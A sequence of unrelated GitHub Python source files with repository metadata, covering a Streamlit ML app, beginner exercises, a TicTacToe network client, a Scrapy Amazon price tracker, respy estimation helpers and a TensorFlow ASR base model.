X_train = data_preprocessor.fit_transform(X_train)\n X_test = data_preprocessor.fit_transform(X_test)\n st.success(f\"X_train Shape:{X_train.shape}, X_test Shape:{X_test.shape}\")\n\n \n if transform_x == 'Log-Transform':\n X_train = np.log(X_train)\n X_test = np.log(X_test)\n st.success(f\"X_train Shape:{X_train.shape}, X_test Shape:{X_test.shape}\")\n\n\n \n if transform_y == 'Log-Transform':\n y_train = np.log(y_train)\n y_test = np.log(y_test)\n st.success(f\"Y_train Shape:{y_train.shape}, Y_test Shape:{y_test.shape}\")\n st.session_state.user_session_data[ctx.session_id]['data'] = [X_train,X_test,y_train,y_test]\n\n data_transformation_form.empty()\n\n\n\n if predict_bool == 'Yes' and 'Yes' not in [params_bool,transform_data_bool,train_model_bool]:\n \n user_data_check()\n check_cache_data()\n model,model_param_dict = check_cache_hyperparams()\n\n\n prediction_form = st.empty()\n preDict = {key:'' for key in st.session_state.user_session_data[ctx.session_id]['data_cols'][0:-1]}\n\n with prediction_form.form('predict_here'):\n for key,value in preDict.items():\n preDict[key] = st.text_input(f\"{key}\",model_param_dict.get(key,value))\n submitted = st.form_submit_button(\"submit\")\n \n if submitted:\n trained_model,X_test,y_test = train_model(data_key,data_source,model)\n sample_data = np.array([int(feature) for key,feature in preDict.items()])\n sample_data = sample_data.reshape(1,len(sample_data))\n st.session_state.user_session_data[ctx.session_id]['pred_algorithm_name'] = algorithm_name\n st.success(f'{trained_model.predict(sample_data)}')\n prediction_form.empty() \n \n\n\n \n return None\n\n\n\nmain()\n","repo_name":"TheResearchLab/Streamlit-No-Code-ML","sub_path":"No-Code-ML.py","file_name":"No-Code-ML.py","file_ext":"py","file_size_in_byte":15360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29859509687","text":"'''\nEscreva um programa que, dada uma matriz quadrada de ordem N, de elementos inteiros,\nexiba os elementos da diagonal principal, isto é, os elementos onde I = J.\nObs: N será lido (N <= 10). \n\n\n'''\n\nA=[]\nn=int(input('Ordem da matriz:'))\nfor i in range(n):\n linha=[]\n for j in range(n):\n print('Elemento[',i,'][',j,']:', sep='', end='')\n num=int(input())\n linha.append(num)\n A.append(linha)\nprint('\\nmatriz A')\nfor i in range(n):\n for j in range(n):\n print('{0:4d}'.format(A[i][j]),end='')\n print('')\n#Exibindo a diagonal principal (versão 1)\nprint('\\nElementos da diagonal principal (versao 1)')\nfor i in range(n):\n for j in range(n):\n if i==j:\n print(A[i][j],' ',end='')\n#Exibindo a diagonal principal (versão 2)\nprint('\\nElementos da diagonal principal (versao 2)')\nfor i in range(n):\n print(A[i][i],' ', end='')","repo_name":"hermanoaraujo/python","sub_path":"Matriz/matriz-diagonal-principal.py","file_name":"matriz-diagonal-principal.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17182403180","text":"class Solution:\n def sortSentence(self, s: str) -> str:\n \n sentence = s.split(' ')\n sortedSentence = [0]*len(sentence)\n \n for i in sentence:\n num = int(i[-1])\n sortedSentence[num-1] = i[:-1]\n return ' '.join(sortedSentence)","repo_name":"addisumotora/competitive_programming","sub_path":"sortingsentence.py","file_name":"sortingsentence.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9894916152","text":"import pickle\r\nimport pandas\r\n\r\n\r\nmypath = \"G:\\\\Datasets&GP\\\\DEAP\\\\data_preprocessed_python\\\\\"\r\n\r\n#Converting each file to csv file\r\nheader = 0\r\nfor i in range(1,33):\r\n t=0\r\n name = \"\"\r\n if i < 10:\r\n name = \"s0\" + str(i)\r\n else:\r\n name = \"s\" + str(i)\r\n print(name)\r\n f = open(mypath+name+\".dat\", 'rb')\r\n data = pickle.load(f, encoding='latin1')\r\n labels = data[\"labels\"]\r\n\r\n for k in range(40) :\r\n\r\n for j in range(4):\r\n Y = labels[k][j]\r\n Y = pandas.Series(Y)\r\n if header==0:\r\n Y.to_csv(mypath+'convertedData\\\\label'+str(j)+'.csv', mode='a', index=False)\r\n else:\r\n Y.to_csv(mypath+'convertedData\\\\label'+str(j)+'.csv', mode='a', index=False,header=False)\r\n header+=1\r\n","repo_name":"PolaPFA/SAEEG","sub_path":"ReadingTheOrginalData/Labels.py","file_name":"Labels.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10324213212","text":"import sys, math\nfrom time import sleep\nfrom PodSixNet.Connection import connection, ConnectionListener\nfrom TicTacToe import TicTacToe\ntemp = \"\"\nclass Client(ConnectionListener, TicTacToe):\n def __init__(self, host, port):\n self.Connect((host, port))\n self.players = {}\n self.data = []\n \n TicTacToe.__init__(self)\n \n \n def Loop(self):\n self.Pump()\n connection.Pump()\n self.Events()\n \n\n def Click(self, e):\n print(e.pos)\n col = math.floor(e.pos[0]/100)\n row = math.floor(e.pos[1]/100)\n connection.Send({\"action\": \"click\", \"position\": e.pos, \"row\":row, \"col\": col})\n\n def newGame(self):\n\n connection.Send({\"action\":\"newgame\"})\n \n ###############################\n ### Network event callbacks ###\n ###############################\n def Network_newgame(self,data):\n print(data)\n self.drawNewBoard()\n def Network_click(self,data):\n print(\"click\")\n print(data)\n self.Turn(data)\n \n \n def Network(self, data):\n #print('network:', data)\n pass\n \n def Network_connected(self, data):\n self.statusLabel = \"connected\"\n print(\"CONNECTED\")\n print(data)\n \n def Network_error(self, data):\n print(data)\n import traceback\n traceback.print_exc()\n self.statusLabel = data['error'][1]\n connection.Close()\n \n def Network_disconnected(self, data):\n self.statusLabel += \" - disconnected\"\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print(\"Usage:\", sys.argv[0], \"host:port\")\n print(\"e.g.\", sys.argv[0], \"localhost:31425\")\n else:\n host, port = sys.argv[1].split(\":\")\n c = Client(host, int(port))\n #c = Client(\"localhost\", 12345)\n while 1:\n c.Loop()\n sleep(0.001)","repo_name":"mfyu/TicTacToe","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8335746422","text":"\"\"\"\nTests for the \"web\" module\n\"\"\"\n\nimport multiprocessing\nimport time\n\nimport flask\nimport pytest\nimport requests\n\nfrom simplespider import Spider\nfrom simplespider.web import DownloadTask, Downloader, LinkExtractor, \\\n ScrapingTask\nfrom simplespider.tests.functional.fixtures import queue # noqa\n\n\n@pytest.fixture(scope='function')\ndef simple_website(request):\n class MyWebsite(multiprocessing.Process):\n def __init__(self, app):\n super(MyWebsite, self).__init__()\n self._app = app\n\n def run(self):\n self._app.run(port=5001)\n\n app = flask.Flask('simple_website')\n\n @app.route('/')\n def homepage():\n return \"\"\"\n \n \n Homepage\n \n Hello, Link!\n \n \n \n \"\"\"\n\n @app.route('/hello')\n def hello():\n # name = flask.request.args.get('name', 'world')\n name = 'world'\n return \"\"\"\n \n \n Homepage\n \n

Hello, {0}!

\n Homepage\n \n \n \"\"\".format(name)\n\n @app.route('/spam')\n def spam():\n return \"\"\"\n \n \n Homepage\n \n

Welcome to the spam page!

\n Homepage\n Spam1\n Spam2!\n Spam3!\n Spam4!\n Hello, again!\n Recursive Spam Page!\n \n \n \"\"\"\n\n proc = MyWebsite(app)\n proc.daemon = True\n\n def cleanup():\n proc.terminate()\n\n request.addfinalizer(cleanup)\n\n proc.start()\n time.sleep(.1) # give it some time to come up..\n return proc\n\n\n@pytest.fixture\ndef web_spider(queue):\n class LoggingSpider(Spider):\n def __init__(self, **kw):\n self._log = []\n super(LoggingSpider, self).__init__(**kw)\n\n def _wrap_task_execution(self, runner, task):\n self._log.append((runner, task))\n super(LoggingSpider, self)._wrap_task_execution(runner, task)\n\n spider = LoggingSpider(queue=queue)\n spider._testing = {\n 'runners': [Downloader(), LinkExtractor()]\n }\n spider.add_runners(spider._testing['runners'])\n return spider\n\n\ndef test_simple_website(simple_website):\n \"\"\"\n Make sure the simple website is behaving..\n \"\"\"\n\n response = requests.get('http://127.0.0.1:5001/hello')\n assert response.ok\n assert response.status_code == 200\n\n response = requests.get('http://127.0.0.1:5001/does-not-exist')\n assert not response.ok\n assert response.status_code == 404\n\n\ndef test_simple_spider_run(simple_website, web_spider):\n web_spider.queue_task(DownloadTask(url='http://127.0.0.1:5001/'))\n #web_spider.run()\n\n tasks = web_spider.yield_tasks()\n\n downloader, scraper = web_spider._testing['runners']\n\n name, task = tasks.next()\n assert name == 'simplespider.web:DownloadTask:http://127.0.0.1:5001/'\n assert isinstance(task, DownloadTask)\n assert task['url'] == 'http://127.0.0.1:5001/'\n web_spider.run_task(task)\n assert web_spider._log.pop(0) == (downloader, task)\n\n name, task = tasks.next()\n assert name == 'simplespider.web:ScrapingTask:http://127.0.0.1:5001/'\n assert isinstance(task, ScrapingTask)\n assert task['url'] == 'http://127.0.0.1:5001/'\n web_spider.run_task(task)\n assert web_spider._log.pop(0) == (scraper, task)\n\n name, task = tasks.next()\n assert name == 'simplespider.web:DownloadTask:http://127.0.0.1:5001/hello'\n assert isinstance(task, DownloadTask)\n assert task['url'] == 'http://127.0.0.1:5001/hello'\n web_spider.run_task(task)\n assert web_spider._log.pop(0) == (downloader, task)\n\n name, task = tasks.next()\n assert name == 'simplespider.web:ScrapingTask:http://127.0.0.1:5001/hello'\n assert isinstance(task, ScrapingTask)\n assert task['url'] == 'http://127.0.0.1:5001/hello'\n web_spider.run_task(task)\n assert web_spider._log.pop(0) == (scraper, task)\n\n # assert len(web_spider._task_queue) == 0\n # assert len(web_spider._log) == 0\n","repo_name":"rshk/simplespider","sub_path":"simplespider/tests/functional/test_web_spider.py","file_name":"test_web_spider.py","file_ext":"py","file_size_in_byte":4761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34092577125","text":"from os import listdir, path\nfrom client.util.HTMLUtil import HTMLUtil\nfrom client.util.html.ButtonBuilder import ButtonBuilder\nfrom client.util.html.ListBuilder import ListBuilder\nfrom client.util.html.LinkBuider import LinkBuilder\n\nvalid_report_types = ['NLU', 'NLU_Timing', 'Refresh_DD', 'Markov_Chain']\n\n\ndef index_routes(app):\n _local_dir = path.dirname(path.abspath(__file__))\n client_path = path.join(_local_dir, '..', '..', 'client')\n\n @app.route('/')\n def index():\n report_path = path.join(client_path, 'compiled')\n\n # read out and sort all compiled reports (ignore the README)\n files = [f for f in listdir(report_path) if path.isfile(path.join(report_path, f)) and f != \"README.md\"]\n files.sort()\n\n file_links = [LinkBuilder(text=f.replace('.html', ''), url='/report?name=' + f) for f in files]\n file_list = ListBuilder(list_items=file_links, list_header='Your Reports')\n\n buttons = [ButtonBuilder(text='New ' + b + ' Report', button_id=b, attrs={\"data-type\": b}) for b in valid_report_types]\n button_list = ListBuilder(list_items=buttons, list_header=' Generate Reports')\n\n template = HTMLUtil.get_template('index.html')\\\n .replace('$$__REPORTS__$$', file_list.compile())\\\n .replace('$$__GEN_REPORTS__$$', button_list.compile())\n\n return template\n\n","repo_name":"michaelalbinson/glowing-pancake-praw","sub_path":"server/routes/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30940053145","text":"# Import the random module here\nimport random\n# Split string method\nnames_string = \"Angela, Ben, Jenny, Michael, Chloe\"\nnames = names_string.split(\", \")\n# 🚨 Don't change the code above 👆\n\n#Write your code below this line 👇\nitems = len(names)\n\nchoice_first = random.randint(0, items -1)\nprint(f'random index returned was: {choice_first}')\nwho_pay = names[choice_first]\nprint(who_pay + \" will pay\")","repo_name":"marwaslim/Python-Udemy","sub_path":"banker_roulette.py","file_name":"banker_roulette.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21048621820","text":"import os\nimport psutil\nimport helper\nimport mpaths\nimport tkinter as tk\nfrom tkinter import messagebox\nfrom tkinter import filedialog\n\ndef setFolder(main_window):\n dialog_root = tk.Tk()\n dialog_root.withdraw()\n folder = filedialog.askdirectory()\n with open(mpaths.path_file, 'w') as file: file.write(folder)\n messagebox.showinfo(\"\",\"Path saved, go start Minify again.\")\n main_window.destroy()\n\n# this class is called with getattr method and calls all functions here alphabetically\n# use naming convention (a_, b_, c_ ...etc) to run this class top to bottom if order mattters\n\nclass MyClass:\n def __init__(self, checkboxes, main_window):\n self.checkboxes = checkboxes\n self.toggle_flag = False\n self.main_window = main_window\n\n def a_isSteamFound(self):\n if mpaths.steam_dir == \"\":\n mpaths.toggle_flag = True\n print(\"Error: 'Steam is not installed on this system.\")\n\n def b_isDotaInstallFound(self):\n dota2path = os.path.join(mpaths.steam_dir, \"steamapps\\\\common\\\\dota 2 beta\\\\game\\\\bin\\\\win64\\\\dota2.exe\")\n\n if not os.path.exists(dota2path):\n self.toggle_flag = True\n \n message_root = tk.Tk()\n message_root.withdraw()\n messagebox.showinfo(\"\",f\"Dota2 not found in '{dota2path}' ---- Select where your 'SteamLibrary' folder is. For example 'D:\\SteamLibrary'\")\n message_root.destroy()\n setFolder(self.main_window)\n \n def c_isMinifyFolderPresent(self):\n if not os.path.exists(mpaths.dota_minify):\n os.makedirs(mpaths.dota_minify)\n\n def d_isGameinfoPatched(self):\n with open(mpaths.gameinfo_dir, 'r') as file:\n if helper.l1 and helper.l2 not in file.read():\n helper.patchGameInfo(mpaths.gameinfo_dir)\n\n def e_isDotaRunning(self):\n if \"dota2.exe\" in (p.name() for p in psutil.process_iter()):\n self.toggle_flag = True\n print(\"Error: Please close Dota 2 and restart Minify.\")\n\n def f_isDecompilerFound(self):\n if not os.path.exists(os.path.join(mpaths.minify_dir, 'Decompiler.exe')):\n self.toggle_flag = True\n print(\"Error: 'Decompiler.exe' not found, click Help for instructions.\")\n \n def g_isDllFound(self):\n if not os.path.exists(os.path.join(mpaths.minify_dir, 'libSkiaSharp.dll')):\n self.toggle_flag = True\n print(\"Error: 'libSkiaSharp.dll' not found, click Help for instructions.\")\n\n def h_isCompillerFound(self):\n if not os.path.exists(mpaths.resource_compiler):\n helper.workshop_installed == False\n print(\"Styling mods have been disabled.\")\n print(\"Install Steam Workshop Tools to use them. Click Help for instructions.\")\n else:\n helper.workshop_installed = True\n\n def i_verifyMods(self):\n for folder in mpaths.mods_folders:\n mod_path = os.path.join(mpaths.mods_dir, folder)\n\n if not os.path.exists(os.path.join(mod_path, 'files')):\n self.toggle_flag = True\n print(\"Missing 'files' folder in 'mods/{}'\".format(folder))\n if not os.path.exists(os.path.join(mod_path, 'blacklist.txt')):\n self.toggle_flag = True\n print(\"Missing 'blacklist.txt' folder in 'mods/{}'\".format(folder))\n if not os.path.exists(os.path.join(mod_path, 'styling.txt')):\n self.toggle_flag = True\n print(\"Missing 'styling.txt' folder in 'mods/{}'\".format(folder))","repo_name":"robbyz512/dota2-minify","sub_path":"validatefiles.py","file_name":"validatefiles.py","file_ext":"py","file_size_in_byte":3574,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"53"} +{"seq_id":"20247044902","text":"from rest_framework import serializers\nfrom . import models\nfrom gemtown.users import models as user_models\nfrom gemtown.songs import models as song_models\nfrom gemtown.modelphotos import models as modelphoto_models\nimport time\n\nclass TimestampField(serializers.Field):\n def to_representation(self, value):\n return int(time.mktime(value.timetuple()))\n\nclass UserSerializer(serializers.ModelSerializer): \n class Meta:\n model = user_models.User\n fields = (\n 'id',\n 'username',\n )\n\nclass SongSerializer(serializers.ModelSerializer): \n class Meta:\n model = song_models.Song\n fields = (\n 'id',\n 'title',\n )\n\nclass MusicCopyrightSerializer(serializers.ModelSerializer): \n song = SongSerializer()\n creator = UserSerializer()\n created_at = TimestampField()\n updated_at = TimestampField()\n class Meta:\n model = models.MusicCopyright \n fields = (\n 'id',\n 'song',\n 'block_chain_txid',\n 'block_chain_id',\n 'confirm_status',\n 'creator',\n 'created_at',\n 'updated_at',\n )\n\nclass ModelPhotoCopyrightSerializer(serializers.ModelSerializer): \n modelphoto = modelphoto_models.ModelPhoto\n creator = UserSerializer()\n created_at = TimestampField()\n updated_at = TimestampField()\n class Meta:\n model = models.ModelPhotoCopyright \n fields = (\n 'id',\n 'modelphoto',\n 'block_chain_txid',\n 'block_chain_id',\n 'confirm_status',\n 'creator',\n 'created_at',\n 'updated_at',\n )\n","repo_name":"doramong0926/gemtown","sub_path":"gemtown/copyrights/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37025917275","text":"\"\"\"This module contains supporting functions for the SMM estimation.\"\"\"\nimport os\n\nimport numpy as np\n\nfrom respy.pre_processing.data_processing import process_dataset\nfrom respy.python.shared.shared_auxiliary import dist_class_attributes\nfrom respy.fortran.interface import write_resfort_initialization\nfrom respy.python.shared.shared_constants import ROOT_DIR, HUGE_FLOAT\nfrom respy_smm.auxiliary_depreciation import respy_obj_from_new_init\nfrom respy.python.simulate.simulate_auxiliary import get_random_types\nfrom respy.python.simulate.simulate_auxiliary import get_random_edu_start, \\\n get_random_lagged_start\n\nfrom respy_smm.src import smm_interface\n\n\ndef get_mpi():\n \"\"\"This function returns the MPI connector (if possible)\"\"\"\n try:\n from mpi4py import MPI\n return MPI\n except ImportError:\n return None\n\n\ndef format_column(x):\n \"\"\"This function provides pretty floats for the columns.\"\"\"\n if isinstance(x, str):\n return '{}'.format(x)\n else:\n return '{:25.5f}'.format(x)\n\n\ndef smm_sample_f2py(state_space_info, initial_conditions, disturbances, slavecomm_f2py, respy_obj):\n \"\"\"This function is a wrapper that is supposed to facilitate the application of SMM\n estimation for the RESPY package.\"\"\"\n\n sample_edu_start, sample_lagged_start = initial_conditions\n periods_draws_emax, periods_draws_sims = disturbances\n\n labels = list()\n labels += ['num_periods', 'edu_spec', 'optim_paras', 'num_draws_emax', 'is_debug']\n labels += ['is_interpolated', 'num_points_interp', 'is_myopic', 'num_agents_sim', \"num_paras\"]\n labels += ['num_procs', 'num_types', 'seed_sim']\n\n num_periods, edu_spec, optim_paras, num_draws_emax, is_debug, is_interpolated, \\\n num_points_interp, is_myopic, num_agents_sim, num_paras, num_procs, num_types, seed_sim = \\\n dist_class_attributes(respy_obj, *labels)\n\n np.random.seed(seed_sim)\n\n shocks_cholesky = optim_paras['shocks_cholesky']\n coeffs_common = optim_paras['coeffs_common']\n coeffs_home = optim_paras['coeffs_home']\n coeffs_edu = optim_paras['coeffs_edu']\n coeffs_a = optim_paras['coeffs_a']\n coeffs_b = optim_paras['coeffs_b']\n delta = optim_paras['delta']\n\n type_spec_shares = optim_paras['type_shares']\n type_spec_shifts = optim_paras['type_shifts']\n\n args = (num_types, optim_paras, num_agents_sim, sample_edu_start, is_debug)\n sample_types = get_random_types(*args)\n\n args = state_space_info + (coeffs_common, coeffs_a, coeffs_b, coeffs_edu, coeffs_home,\n shocks_cholesky, delta, is_interpolated, num_points_interp, num_draws_emax, num_periods,\n is_myopic, is_debug, periods_draws_emax, num_agents_sim, periods_draws_sims,\n type_spec_shares, type_spec_shifts, edu_spec['start'], edu_spec['max'], edu_spec['lagged'],\n edu_spec['share'], num_paras, sample_edu_start, sample_lagged_start, sample_types,\n slavecomm_f2py)\n\n dat = smm_interface.wrapper_smm(*args)\n\n return dat\n\n\ndef get_communicator(respy_obj, data_array=None):\n \"\"\"This is a temporary function that sets up the communicator.\"\"\"\n\n # There is no data available for the SMM estimation, so we generate a random sample that\n # eases the all code that is coming later.\n if data_array is None:\n data_array = np.random.uniform(size=64).reshape(8, 8)\n\n labels = list()\n labels += ['optim_paras', 'num_periods', 'edu_spec', 'is_debug', 'num_draws_emax']\n labels += ['seed_emax', 'is_interpolated', 'num_points_interp', 'is_myopic', 'tau']\n labels += ['num_procs', 'num_agents_sim', 'num_draws_prob', 'seed_prob', 'seed_sim']\n labels += ['optimizer_options', 'optimizer_used', 'maxfun', 'precond_spec', 'file_sim']\n labels += ['num_paras', 'num_types', 'num_agents_est']\n\n optim_paras, num_periods, edu_spec, is_debug, num_draws_emax, seed_emax, is_interpolated, \\\n num_points_interp, is_myopic, tau, num_procs, num_agents_sim, num_draws_prob, \\\n seed_prob, seed_sim, optimizer_options, optimizer_used, maxfun, precond_spec, \\\n file_sim, num_paras, num_types, num_agents_est = dist_class_attributes(respy_obj, *labels)\n\n args = (optim_paras, is_interpolated, num_draws_emax, num_periods, num_points_interp,\n is_myopic, edu_spec, is_debug, num_draws_prob, num_agents_sim, seed_prob, seed_emax,\n tau, num_procs, 'simulate', seed_sim, optimizer_options, optimizer_used, maxfun, num_paras,\n precond_spec, file_sim, data_array, num_types, num_agents_est)\n\n write_resfort_initialization(*args)\n\n MPI = get_mpi()\n info = MPI.Info.Create()\n info.Set('wdir', os.getcwd())\n\n test = ROOT_DIR + '/.bld/fortran/resfort_slave'\n worker = MPI.COMM_SELF.Spawn(test, info=info, maxprocs=num_procs - 1)\n\n return worker\n\n\ndef is_valid_covariance_matrix(shocks_coeffs_new):\n sds, rho = shocks_coeffs_new[:4], shocks_coeffs_new[4:]\n\n shocks_cov = np.zeros((4, 4))\n\n shocks_cov[1, 0] = rho[0] * sds[1] * sds[0]\n shocks_cov[2, 0] = rho[1] * sds[2] * sds[0]\n shocks_cov[2, 1] = rho[2] * sds[2] * sds[1]\n shocks_cov[3, 0] = rho[3] * sds[3] * sds[0]\n shocks_cov[3, 1] = rho[4] * sds[3] * sds[1]\n shocks_cov[3, 2] = rho[5] * sds[3] * sds[2]\n\n np.fill_diagonal(shocks_cov, sds ** 2)\n\n shocks_cov = shocks_cov + shocks_cov.T - np.diag(shocks_cov.diagonal())\n try:\n np.linalg.cholesky(shocks_cov)\n return True\n except np.linalg.linalg.LinAlgError:\n return False\n\n\ndef get_processed_dataset(init_file):\n respy_obj = respy_obj_from_new_init(init_file)\n data_array = process_dataset(respy_obj).values\n data_array[np.isnan(data_array)] = HUGE_FLOAT\n data_array = np.ascontiguousarray(data_array, np.float64)\n\n return data_array\n\n\ndef get_initial_conditions(respy_obj):\n # TODO: Cleanup the attribute list, not all needed.\n labels = list()\n labels += ['num_procs', 'num_periods', 'is_debug', 'seed_emax', 'seed_sim']\n labels += ['num_draws_emax', 'num_agents_sim', 'num_types', 'edu_spec', 'version']\n\n num_procs, num_periods, is_debug, seed_emax, seed_sim, num_draws_emax, num_agents_sim, \\\n num_types, edu_spec, version = dist_class_attributes(respy_obj, *labels)\n\n np.random.seed(seed_sim)\n sample_edu_start = get_random_edu_start(edu_spec, num_agents_sim, is_debug)\n sample_lagged_start = get_random_lagged_start(edu_spec, num_agents_sim, sample_edu_start,\n is_debug)\n\n return sample_edu_start, sample_lagged_start\n","repo_name":"mo2561057/respy_estimagic","sub_path":"respy_smm/auxiliary.py","file_name":"auxiliary.py","file_ext":"py","file_size_in_byte":6510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22908789208","text":"import scrapy\nfrom scrapy.contrib.spiders import CrawlSpider, Rule\nfrom scrapy.contrib.linkextractors.lxmlhtml import LxmlLinkExtractor\nfrom aragog.items import AragogItem\nimport datetime\nfrom pymongo import MongoClient\nfrom scrapy.conf import settings\nfrom scrapy.http.request import Request\n\nclass AmazonUpdateSpider(CrawlSpider):\n\tname = 'aragogUpdate'\n\tallowed_domains = ['amazon.in']\t\n\tstart_urls = [ ]\n\t# rules = (\n\t# \tRule(LxmlLinkExtractor(allow=(r'\\/([A-Z])([A-Z0-9]{9})'),deny=(r'product\\-reviews',r'offer\\-listing')),callback='parse_item'),\n\t# \t)\n\t\t\n\tdef __init__(self):\n\t\tclient = MongoClient(\n\t\t\tsettings['MONGODB_SERVER'],\n\t\t\tsettings['MONGODB_PORT']\n\t\t)\n\n\t\tdb = client[settings['MONGODB_DB']]\n\t\tself.collection = db[settings['MONGODB_COLLECTION']]\n\n\tdef start_requests(self):\n\t\turls = self.collection.find({},{\"url\":1,\"_id\":0})\n\t\tfor url in urls:\n\t\t\tyield Request(url[\"url\"], self.parse)\n\n\tdef parse(self,response):\n\t\titem = AragogItem()\n\t\ttry:\n\t\t\titem['name'] = response.xpath('//*[@id=\"productTitle\"]/text()').extract()[0].encode('ascii','ignore')\n\t\t\titem['reviews'] = response.xpath('//*[@id=\"acrCustomerReviewText\"]/text()').extract()[0].encode('ascii','ignore')\n\t\t\titem['url'] = response.url\n\t\t\titem['rating'] = response.xpath('//*[@id=\"avgRating\"]/span/text()').extract()[0].encode('ascii','ignore').replace('\\n',' ').strip()\n\t\t\titem['pid'] = response.url.split('/ref=')[0].split('/')[-1].encode('ascii','ignore')\n\t\t\titem['price'] = [response.xpath('//*[@id=\"price\"]/table//span[starts-with(@id,\"priceblock\")]//text()').extract()[1].encode('ascii','ignore').strip()]\n\t\t\titem['desc'] = [desc.encode('ascii','ignore') for desc in response.xpath('//*[@id=\"feature-bullets\"]/ul/li/span/text()').extract() ]\n\t\t\titem['timestamp'] = [str(datetime.datetime.now())]\n\t\t\tprint(item)\n\t\texcept:\n\t\t\tprint('Not a product!')\n\t\t\titem = None\n\t\tyield item\n\n\tdef dummy(self,response):\n\t\tprint(str(response.url))","repo_name":"kbyagnik/Amazon-PriceTracker","sub_path":"src/aragog/aragog/spiders/update_spider.py","file_name":"update_spider.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"53"} +{"seq_id":"44030303260","text":"import tensorflow as tf\n\nfrom tensorflow_asr.utils import env_util, file_util\n\n\nclass BaseModel(tf.keras.Model):\n def save(\n self,\n filepath,\n overwrite=True,\n include_optimizer=True,\n save_format=None,\n signatures=None,\n options=None,\n save_traces=True,\n ):\n with file_util.save_file(filepath) as path:\n super().save(\n filepath=path,\n overwrite=overwrite,\n include_optimizer=include_optimizer,\n save_format=save_format,\n signatures=signatures,\n options=options,\n save_traces=save_traces,\n )\n\n def save_weights(\n self,\n filepath,\n overwrite=True,\n save_format=None,\n options=None,\n ):\n with file_util.save_file(filepath) as path:\n super().save_weights(filepath=path, overwrite=overwrite, save_format=save_format, options=options)\n\n def load_weights(\n self,\n filepath,\n by_name=False,\n skip_mismatch=False,\n options=None,\n ):\n with file_util.read_file(filepath) as path:\n super().load_weights(filepath=path, by_name=by_name, skip_mismatch=skip_mismatch, options=options)\n\n @property\n def metrics(self):\n if not hasattr(self, \"_tfasr_metrics\"):\n self._tfasr_metrics = {}\n return list(self._tfasr_metrics.values())\n\n def add_metric(\n self,\n metric: tf.keras.metrics.Metric,\n ):\n if not hasattr(self, \"_tfasr_metrics\"):\n self._tfasr_metrics = {}\n self._tfasr_metrics[metric.name] = metric\n\n def make(self, *args, **kwargs):\n \"\"\"Custom function for building model (uses self.build so cannot overwrite that function)\"\"\"\n raise NotImplementedError()\n\n def compile(\n self,\n loss,\n optimizer,\n run_eagerly=None,\n **kwargs,\n ):\n self.use_loss_scale = False\n if not env_util.has_devices(\"TPU\"):\n optimizer = tf.keras.mixed_precision.experimental.LossScaleOptimizer(tf.keras.optimizers.get(optimizer), \"dynamic\")\n self.use_loss_scale = True\n self.add_metric(metric=tf.keras.metrics.Mean(name=\"loss\", dtype=tf.float32))\n super().compile(optimizer=optimizer, loss=loss, run_eagerly=run_eagerly, **kwargs)\n\n # -------------------------------- STEP FUNCTIONS -------------------------------------\n\n def train_step(self, batch):\n \"\"\"\n Args:\n batch ([tf.Tensor]): a batch of training data\n\n Returns:\n Dict[tf.Tensor]: a dict of validation metrics with keys are the name of metric\n\n \"\"\"\n inputs, y_true = batch\n with tf.GradientTape() as tape:\n y_pred = self(inputs, training=True)\n loss = self.loss(y_true, y_pred)\n if self.use_loss_scale:\n scaled_loss = self.optimizer.get_scaled_loss(loss)\n if self.use_loss_scale:\n gradients = tape.gradient(scaled_loss, self.trainable_weights)\n gradients = self.optimizer.get_unscaled_gradients(gradients)\n else:\n gradients = tape.gradient(loss, self.trainable_weights)\n self.optimizer.apply_gradients(zip(gradients, self.trainable_variables))\n self._tfasr_metrics[\"loss\"].update_state(loss)\n return {m.name: m.result() for m in self.metrics}\n\n def test_step(self, batch):\n \"\"\"\n Args:\n batch ([tf.Tensor]: a batch of validation data\n\n Returns:\n Dict[tf.Tensor]: a dict of validation metrics with keys are the name of metric prefixed with \"val_\"\n\n \"\"\"\n inputs, y_true = batch\n y_pred = self(inputs, training=False)\n loss = self.loss(y_true, y_pred)\n self._tfasr_metrics[\"loss\"].update_state(loss)\n return {m.name: m.result() for m in self.metrics}\n\n def predict_step(self, batch):\n \"\"\"\n Args:\n batch ([tf.Tensor]): a batch of testing data\n\n Returns:\n [tf.Tensor]: stacked tensor of shape [B, 3] with each row is the text [truth, greedy, beam_search]\n \"\"\"\n inputs, y_true = batch\n labels = self.text_featurizer.iextract(y_true[\"labels\"])\n greedy_decoding = self.recognize(inputs)\n if self.text_featurizer.decoder_config.beam_width == 0:\n beam_search_decoding = tf.map_fn(lambda _: tf.convert_to_tensor(\"\", dtype=tf.string), labels)\n else:\n beam_search_decoding = self.recognize_beam(inputs)\n return tf.stack([labels, greedy_decoding, beam_search_decoding], axis=-1)\n\n # -------------------------------- INFERENCE FUNCTIONS -------------------------------------\n\n def recognize(self, *args, **kwargs):\n \"\"\"Greedy decoding function that used in self.predict_step\"\"\"\n raise NotImplementedError()\n\n def recognize_beam(self, *args, **kwargs):\n \"\"\"Beam search decoding function that used in self.predict_step\"\"\"\n raise 